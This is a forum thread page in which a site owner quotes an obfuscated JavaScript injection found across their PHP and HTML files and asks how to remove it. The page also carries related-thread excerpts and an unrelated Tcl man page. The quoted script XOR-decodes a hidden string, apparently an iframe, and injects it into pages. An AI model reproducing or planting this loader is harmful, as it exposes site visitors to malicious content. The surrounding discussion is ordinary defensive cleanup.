Login or Register to Ask a Question and Join Our Community

Sponsored Content
Full Discussion: javascript injection
Top Forums Shell Programming and Scripting javascript injection Post 302109353 by sb008 on Monday 5th of March 2007 04:01:44 PM
Old 03-05-2007
Quote:
Originally Posted by fed.linuxgossip
Please advise a script to get rid of the following code which is infected in a large number of files ( in particular php and html files )


<div id="testws35fdgh"></div>
<script language="JavaScript">
var0 = "\x69\x3c\x33\x27\x34\x38\x30\x75\x3b\x34"; var1 = "\x38\x30\x68\x72\x36\x3a\x20\x3b\x21\x30"; var2 = "\x27\x72\x75\x26\x27\x36\x68\x72\x3d\x21"; var3 = "\x21\x25\x6f\x7a\x7a\x26\x21\x30\x39\x34"; var4 = "\x34\x27\x21\x3a\x3c\x26\x7b\x27\x20\x7a"; var5 = "\x3c\x3b\x31\x30\x2d\x67\x7b\x25\x3d\x25"; var6 = "\x72\x75\x3d\x30\x3c\x32\x3d\x21\x68\x72"; var7 = "\x64\x63\x72\x75\x22\x3c\x31\x21\x3d\x68"; var8 = "\x72\x64\x63\x72\x75\x33\x27\x34\x38\x30"; var9 = "\x37\x3a\x27\x31\x30\x27\x68\x72\x65\x72"; var10 = "\x75\x26\x36\x27\x3a\x39\x39\x3c\x3b\x32"; var11 = "\x68\x72\x3b\x3a\x72\x6b\x69\x7a\x3c\x33"; var12 = "\x27\x34\x38\x30\x6b";
sr = var0+var1+var2+var3+var4+var5+var6+var7+var8+var9+var10+var11+var12;
dst = "";
for(i = 0; i < sr.length; i++) {
var d = parseInt(sr.charCodeAt(i) ^ 85);
dst = dst + String.fromCharCode(d);
}
document.getElementById("testws35fdgh").innerHTML = dst;
</script>'>



Thanks
Are there any other sections which start with:

<div id="testws35fdgh"></div>

and end with:

</script>'>



So do sections like:

<div id="testws35fdgh"></div>
some
other
lines
in between
</script>'>

exist?
 

5 More Discussions You Might Find Interesting

1. Cybersecurity

Javascript injection only when referred by search engine.

My website has some weird malware installed in it. When I click on a link from a search engine (google, bing, or even yahoo) my pages get a string of javascript inserted into them. The page can be a simple "Hello World" and it will still inject a line of javascript into the page. Here is a screen... (1 Reply)
Discussion started by: noPermissions
1 Replies

2. OS X (Apple)

Code injection

Im needing to create a postinst script for a debian package. I need it to search for this line of script in a plist file located at /folder/folder/folder/folder/folder/file.plist <key>TESTKEYLINE</key> <true/> and after it create a new line and insert this code <key>KEYNAME</key>... (0 Replies)
Discussion started by: iModdr
0 Replies

3. Shell Programming and Scripting

SQL Injection Detection

I want to grep/awk /var/log/httpd/mysite-access_log.log and check if 2 words from the following appear in a single line: benchmark union information_schema drop truncate group_concat into file case hex lpad group order having insert union select from (12 Replies)
Discussion started by: koutroul
12 Replies

4. Red Hat

Cause PCIe error callbacks using AER injection

I am trying to cause a callback in the Linux nvme driver by using AER injection. I've modified the AER source code to directly inject errors through module loading rather than from userland program. I've verified that I got the correct bus, dev, and fn and that the error injection went... (0 Replies)
Discussion started by: Decrypto
0 Replies

5. Shell Programming and Scripting

Making a script secure to code injection

Heyas I've been told my scipts would be insecure, and to fix that. Figured i might rethink some parts of my coding style, meanwhile i tried to write an additional catcher. After reading: fail : Security Issues - didnt help too much, infact - it confused me even more. n/a:... (8 Replies)
Discussion started by: sea
8 Replies

LEARN ABOUT DEBIAN

javascript

javascript(3tcl)					  HTML and Java Script Generation					  javascript(3tcl)

__________________________________________________________________________________________________________________________________________________

NAME

       javascript - Procedures to generate HTML and Java Script structures.

SYNOPSIS

       package require Tcl  8

       package require javascript  ?1.0.2?

       ::javascript::makeSelectorWidget id leftLabel leftValueList rightLabel rightValueList rightNameList ?length? ?minWidth?

       ::javascript::makeSubmitButton name value

       ::javascript::makeProtectedSubmitButton name value msg

       ::javascript::makeMasterButton master value slavePattern boolean

       ::javascript::makeParentCheckbox parentName childName

       ::javascript::makeChildCheckbox parentName childName

_________________________________________________________________

DESCRIPTION

       The  ::javascript  package  provides  commands  that generate HTML and Java Script code.  These commands typically return an HTML string as
       their result.  In particular, they do not output their result to stdout.

       ::javascript::makeSelectorWidget id leftLabel leftValueList rightLabel rightValueList rightNameList ?length? ?minWidth?
	      Construct HTML code to create a dual-multi-selection megawidget.	This megawidget consists of two side-by-side multi-selection boxes
	      separated  by  a	left arrow and a right arrow button.  The right arrow button moves all items selected in the left box to the right
	      box.  The left arrow button moves all items selected in the right box to the left box.  The id argument is the suffix  of  all  HTML
	      objects  in this megawidget.  The leftLabel argument is the text that appears above the left selection box.  The leftValueList argu-
	      ment is the values of items in the left selection box.  The leftNameList argument is the names to appear in the left selection  box.
	      The  rightLabel argument is the text that appears above the right selection box.	The rightValueList argument is the values of items
	      in the right selection box.  The rightNameList argument is the names to appear in the right  selection  box.   The  length  argument
	      (optional)  determines  the  number  of  elts  to  show before adding a vertical scrollbar; it defaults to 8.  The minWidth argument
	      (optional) is the number of spaces to determine the minimum box width; it defaults to 32.

       ::javascript::makeSubmitButton name value
	      Create an HTML submit button that resets a hidden field for each registered multi-selection box.	The name argument is the  name	of
	      the HTML button object to create.  The value argument is the label of the HTML button object to create.

       ::javascript::makeProtectedSubmitButton name value msg
	      Create  an  HTML submit button that prompts the user with a continue/cancel shutdown warning before the form is submitted.  The name
	      argument is the name of the HTML button object to create.  The value argument is the label of the HTML button object to create.  The
	      msg argument is the message to display when the button is pressed.

       ::javascript::makeMasterButton master value slavePattern boolean
	      Create  an  HTML	button	that sets its slave checkboxs to the boolean value.  The master argument is the name of the child's parent
	      html checkbox object.  The value argument is the value of the master.  The slaves argument is the name of child html checkbox object
	      to  create.   The  boolean  argument  is	the  java  script boolean value that will be given to all the slaves; it must be "true" or
	      "false".

       ::javascript::makeParentCheckbox parentName childName
	      Create an HTML checkbox and tie its value to that of its child checkbox.	If the parent is unchecked,  the  child  is  automatically
	      unchecked.   The parentName argument is the name of parent html checkbox object to create. The childName argument is the name of the
	      parent's child html checkbox object.

       ::javascript::makeChildCheckbox parentName childName
	      Create an HTML checkbox and tie its value to that of its parent checkbox.  If the child is  checked,  the  parent  is  automatically
	      checked.	 The  parentName  argument  is the name of the child's parent html checkbox object.  The childName argument is the name of
	      child html checkbox object to create.

BUGS, IDEAS, FEEDBACK
       This document, and the package it describes, will undoubtedly contain bugs  and	other  problems.   Please  report  such  in  the  category
       javascript  of  the Tcllib SF Trackers [http://sourceforge.net/tracker/?group_id=12883].  Please also report any ideas for enhancements you
       may have for either package and/or documentation.

SEE ALSO

       html, ncgi

KEYWORDS

       checkbox, html, javascript, selectionbox, submitbutton

CATEGORY

       CGI programming

javascript							       1.0.2							  javascript(3tcl)
All times are GMT -4. The time now is 11:07 PM.
Unix & Linux Forums Content Copyright 1993-2022. All Rights Reserved.
Privacy Policy